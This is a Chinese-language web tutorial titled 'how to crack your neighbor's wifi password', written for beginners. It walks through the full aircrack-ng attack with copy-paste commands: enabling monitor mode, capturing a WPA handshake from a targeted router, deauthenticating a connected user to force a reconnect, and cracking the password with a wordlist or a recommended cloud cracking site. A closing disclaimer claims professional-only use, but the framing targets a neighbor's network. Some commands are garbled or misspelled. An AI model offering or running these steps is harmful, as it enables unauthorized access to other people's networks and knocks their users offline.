如何破解邻居的wifi密码

注意：这个方法对于完全没有计算机基础的小白来说可能会有些困难。不过门槛也没那么高，如果你刚刚入门完全可自行操作。小白建议咨询一下身边有复制别人代码操作过终端的朋友协助一下。

工具准备

1、支持监听的网卡一张（大概20多块钱，不贵）

2、一个虚拟机或物理机，可以把家里的旧电脑旧笔记本翻出来装一下，如果没有，就建议虚拟机上直接开搞

windows VM虚拟机（建议17以上版本）：
https://www.cnblogs.com/sysin/p/18751207#_label2

3、kali镜像文件

https://www.kali.org/get-kali/#kali-virtual-machines

虚拟机的话找到对应版本下载即可

正式开始

下载了vm文件后可以直接用虚拟机打开安装，开机后默认用户名和密码都是： 用户名：kali 密码：kali

然后左上角打开ssh工具，把下面的代码依次复制进去，每次输入完要按回车

#提升权限
sudo su

#查看网卡
airmon-ng

如果没有，请注意是否开启了网卡在虚拟机的连接，如下图

如果没有，继续在ssh终端窗口操作

打开一个终端窗口

开启网卡监控

#开启网卡监控
airmon-ng start wlan0

可以使用命令看看网卡的名字是否改变

ifconfig

可以看到最后的那个名字已经改变

airodump-ng wlan0mon

我们选择这个名叫adcd的wifi进行破解演示

等待抓取握手包

上述方法后，按ctrl+c，退出扫描

airodump-ng -w freedom -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa

-c：指定信道 -w：指定抓去握手包的存放位置或者名字，freedom是一会抓去的握手包的名字 –bssid：指定路由器的MAC

需要更改两个参数，信道和地址，这两个参数分别是扫描wifi时确定要破解的wifi参数

回车后，如下界面

从这个界面可以看出，选定的wifi一共有一个人连接，没有人连接的wifi是无法破解的

爆破 抓取握手包

这个步骤，说白了，就是将一个用户踢下线，让他重新连接WIFI，这样我们就能监听并且截取到握手包

重启一个终端窗口，一样的，申请管理员权限，密码默认：kali

sudo su

执行如下命令，同样的，需要输入上一步的两个参数，一个客户机的MAC，和路由器的MAC

aireplay-ng -0 2 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon

-a：指定路由器的MAC -c：指定客户机的MAC

执行成功后如上图，表明该客户机以及被成功的踢下线，我们要做的就是等待客户机重新连接，他只要重新连接了，我们就能抓到握手包，进行跑字典破解

抓取成功

当第四步的终端窗口出现如下

表明成功抓取到握手包，进行下一个步骤 注意！！这里抓到包一定要按ctrl+c退出抓包，不然抓到的握手包用不了哦

开始破解

包在**/home/kali/**文件夹下，找到名叫freedom-01.ivs文件，这个就是抓到的包

后面就是跑包了，跑包对算力要求比较高，再折腾就没什么意义了，本地又比较受限与字典，这里推荐一个云端跑包平台
https://www.ccwifi.cc/

然后继续说跑包

然后再次重起一个终端窗口，输入如下命令

ircrack-ng -w pass.txt freedom-*.ivs

回车开始解密

能否成功看字典的是否强大，也看脸，所以还是推荐云端平台
字典也已经给大家准备好了，应对一般的密码都是没什么问题的，算力足够的话一天足矣，点击上方下载按钮即可获取

失败界面

还有另一种Fluxion(Crack WPA/WPA2 无需字典的方案，不过对小白来说有些门槛，如果你是技术人员，可以参考此文：https://www.jianshu.com/p/d16e86c41336，这里就不作过多讲解了。

本站所有资源信息仅供安全测试从业人员、安全技术专家、反诈及相关领域专业人员用于逆向工程、安全测试、技术研究与学习，严禁任何形式的公开传播或非授权使用。技术本身无罪，本站及作者不为用户在使用过程中产生的任何违法违规行为负责。用户自阅读本协议内容起，直至关闭本页面前，视为已充分理解并自愿接受本协议所有条款。请务必遵守相关法律法规，合法合规使用技术资源。

禁止违规使用或商用，下载本站资源即视为同意本站所有协议，请下载后一小时内删除